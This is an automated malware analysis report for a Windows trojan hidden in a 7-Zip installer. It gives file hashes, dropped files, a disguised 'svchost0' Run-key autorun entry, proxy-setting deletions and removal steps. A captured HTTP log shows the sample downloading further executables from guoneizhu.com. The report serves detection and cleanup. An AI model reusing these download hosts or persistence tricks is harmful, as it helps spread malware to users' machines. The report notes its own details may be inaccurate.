Trojan.Win32.Agent.nezazd (Kaspersky), Gen:Variant.Zusy.224016 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0e79a1d33eb1d2beb44de83b00383f78
SHA1: 9a90b617307c1b4ec117d5d3a862bf227958d9e3
SHA256: aa0e234b7b43495cd2272d403f78bc60194c3219e1ecf861d1f28cf036a62624
SSDeep: 12288:7XwOrReFWQFe6hErRivAk/IpImWpzTXyVhRElM5VsA:7XwOrRsiMErRivAJSWVhWcVh
Size: 463415 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-31 02:38:51
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
setup.exe:4040
uc.exe:3972
Bind.exe:3680
%original file name%.exe:3844
setup.tmp:3412
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process setup.exe:4040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp\setup.tmp (1423 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp\setup.tmp (0 bytes)
The process Bind.exe:3680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_r_4728_(Build1702151518).exe (1471609 bytes)
The process %original file name%.exe:3844 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (1288 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000 (0 bytes)
The process setup.tmp:3412 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\fff\unins000.dat (1376 bytes)
%Program Files%\fff\fff.ini (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup\_shfoldr.dll (47 bytes)
%Program Files%\fff\Bind.exe (73 bytes)
%Program Files%\fff\is-HK0TD.tmp (23961 bytes)
%Program Files%\fff\is-HIE46.tmp (673 bytes)
%Program Files%\fff\uc.exe (192 bytes)
%Program Files%\fff\is-6T2JC.tmp (601 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup\_shfoldr.dll (0 bytes)
Registry activity
The process uc.exe:3972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost0" = "%Program Files%\fff\uc.exe"
The process Bind.exe:3680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "80 5D F8 EC 75 9D D2 01"
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "80 5D F8 EC 75 9D D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:3844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process setup.tmp:3412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"RegFilesHash" = "68 EB 27 85 4B 4C 47 E0 DF 55 83 6F 1B A4 1C D0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFiles0000" = "%Program Files%\fff\uc.exe, %Program Files%\fff\Bind.exe"
"SessionHash" = "A0 8F 16 97 54 36 AE EC A6 2F 93 7D AC 26 C8 7E"
"Owner" = "54 0D 00 00 BA 9D 21 E7 75 9D D2 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\RestartManager\Session0000]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFilesHash"
"Sequence"
"RegFiles0000"
"SessionHash"
"Owner"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
Dropped PE files
MD5 | File path |
---|---|
ec58caa0cb658e8958ece2811583c6c0 | c:\Program Files\fff\Bind.exe |
82e42e2a674a2d98e8688ef29696fdb4 | c:\Program Files\fff\uc.exe |
f13f028e99888a77e21c721961101339 | c:\Program Files\fff\unins000.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
setup.exe:4040
uc.exe:3972
Bind.exe:3680
%original file name%.exe:3844
setup.tmp:3412
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp\setup.tmp (1423 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_r_4728_(Build1702151518).exe (1471609 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (1288 bytes)
%Program Files%\fff\unins000.dat (1376 bytes)
%Program Files%\fff\fff.ini (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup\_shfoldr.dll (47 bytes)
%Program Files%\fff\Bind.exe (73 bytes)
%Program Files%\fff\is-HK0TD.tmp (23961 bytes)
%Program Files%\fff\is-HIE46.tmp (673 bytes)
%Program Files%\fff\uc.exe (192 bytes)
%Program Files%\fff\is-6T2JC.tmp (601 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost0" = "%Program Files%\fff\uc.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name: Oleg N. Scherbakov
Product Name: 7-Zip SFX
Product Version: 1.6.0.2712
Legal Copyright: Copyright (c) 2005-2012 Oleg N. Scherbakov
Legal Trademarks:
Original Filename: 7ZSfxMod_x86.exe
Internal Name: 7ZSfxMod
File Version: 1.6.0.2712
File Description: 7z Setup SFX (x86)
Comments:
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 101854 | 101888 | 4.62608 | 0c04e49d78a3c453186c916e6f29540d |
.rdata | 106496 | 15306 | 15360 | 3.96022 | 1eff757b36a6b7a599236ac8b1b35b4d |
.data | 122880 | 19948 | 2560 | 3.08518 | 21d5c7a8ba54658b1e07909bf1045c79 |
.rsrc | 143360 | 6124 | 6144 | 2.63104 | 6cfc1356822af5f0acc53b008cf23f9b |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
5a212666f160fc40508f1bb3da9a0e4e
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.guoneizhu.com/ucni.txt | |
hxxp://www.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518).exe | |
teredo.ipv6.microsoft.com | 157.56.120.207 |
dns.msftncsi.com | 131.107.255.255 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /ucni.txt HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 13 Mar 2017 11:20:02 GMT
Accept-Ranges: bytes
ETag: "d5a67fc2eb9bd21:0"
Server: Microsoft-IIS/10.0
Date: Wed, 15 Mar 2017 10:21:03 GMT
Content-Length: 334
hXXp://VVV.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518).exe Browser_V6.0.1471.913_r_4728_(Build1702151518).exe..hXXp://VVV.guoneizhu.com/FlowSpritSetup_slnt_5011.exe FlowSpritSetup_slnt_5011.exe..hXXps://res05.bignox.com/s3group/M00/2017/1/16/c9ce6fdbe0c8474580a2ed9c3688c372.exe c9ce6fdbe0c8474580a2ed9c3688c372.exe..HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Mon, 13 Mar 2017 11:20:02 GMT..Accept-Ranges: bytes..ETag: "d5a67fc2eb9bd21:0"..Server: Microsoft-IIS/10.0..Date: Wed, 15 Mar 2017 10:21:03 GMT..Content-Length: 334..http://VVV.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518).exe Browser_V6.0.1471.913_r_4728_(Build1702151518).exe..hXXp://VVV.guoneizhu.com/FlowSpritSetup_slnt_5011.exe FlowSpritSetup_slnt_5011.exe..hXXps://res05.bignox.com/s3group/M00/2017/1/16/c9ce6fdbe0c8474580a2ed9c3688c372.exe c9ce6fdbe0c8474580a2ed9c3688c372.exe......
GET /Browser_V6.0.1471.913_r_4728_(Build1702151518).exe HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 21 Feb 2017 14:15:23 GMT
Accept-Ranges: bytes
ETag: "6f2ddcf04c8cd21:0"
Server: Microsoft-IIS/10.0
Date: Wed, 15 Mar 2017 10:21:04 GMT
Content-Length: 51179792
MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......]....o...o...o....]..o...._..o....^.;o...6...o....k..o..w4...o..w4..Xo..w4..[o....X..o..w2...o....C.>o...o...m...4..Xo...4...o...4..]o...4...o...4S..o...o;..o...4...o..Rich.o..........................PE..L...Y..X..................................... ....@..........................P..........................................Y.......T......................../.......n..@...T...............................@............................................text...I........................... ..`.data...<e... ......................@....idata...,...........&..............@..@.gfids..(............T..............@..@.tls.................X..............@....rsrc................Z..............@..@.reloc...n.......p...R..............@..B..........................................................................................................................................................................A.......J...A...A...A...A...A...A...A...A...A...A...A...A.3.A.'.A.?.A.Z.A.u.A...A...A.p.A...........J...J...J.)JK.mhL...L.o.L......... .E...........L...L..KK.................{.6.5.1.2.2.C.B.0.-.E.A.0.F.-.4.7.D.F.-.A.9.5.3.-.0.1.7.1.7.0.E.D.1.2.F.9.}.....{.4.e.a.1.6.a.c.7.-.f.d.5.a.-.4.7.c.3.-.8.7.5.b.-.d.b.f.4.a.2.0.0.8.c.2.0.}.....{.8.B.A.9.8.6.D.A.-.5.1.0.0.-.4.0.5.E.-.A.A.3.5.-.8.6.F.3.4.A.0.2.A.C.B.F.}.....{.4.D.C.8.B.4.C.A.-.1.B.D.A.-.4.8.3.e.-.B.5.F.A.-.D.3.C.1.2.E.1.5.B.6.2.D.}.......E.-.-.c.
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
uc.exe_3972:
.text
`.rdata
@.data
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegOpenKeyW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
GetCPInfo
%s\*.*
%s\%s
@.reloc
GetProcessWindowStation
"%/28;=#$019:>?
ÂmgM
zcÃ
1 1@1`1|1
8 8$80848
%Program Files%\fff\uc.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\2345
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\aa.lnk
Chrome_WidgetWin_1
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
C:\Users\Public\Desktop\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC1}_is1
%s\Internet Explorer\iexplore.exe
http\shell\open\command
qqbrowser.exe
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\UC
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
%s\UCBrowser.exe
mscoree.dll
@KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
index.dat
%Program Files% (x86)\UCBrowser\Application\UCBrowser.exe
%Program Files% (x86)\2345Soft\2345Explorer\2345Explorer.exe
%Program Files% (x86)\KuaiZip\X86\KuaiZip.exe
%Program Files% (x86)\IQIYI Video\LStyle\5.3.21.2676\QyClient.exe
%Program Files% (x86)\LuDaShi\ComputerZ_CN.exe
%Program Files% (x86)\YouKu\YoukuClient\YoukuDesktop.exe
InstallerSuccessLaunchCmdLine
Software\Microsoft\Windows\CurrentVersion\Run
\UUC0789.exe
uc.exe
1, 0, 0, 1
Bind.exe_3680:
.text
`.rdata
@.data
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
ShellExecuteA
SHELL32.dll
InternetOpenUrlA
HttpQueryInfoA
WININET.dll
GetCPInfo
GET%sHTTP/1.1
Range: bytes=%d-
%Program Files%\fff\Bind.exe
Bind.exe
1, 0, 0, 1
msctls_hotkey32
HotKey1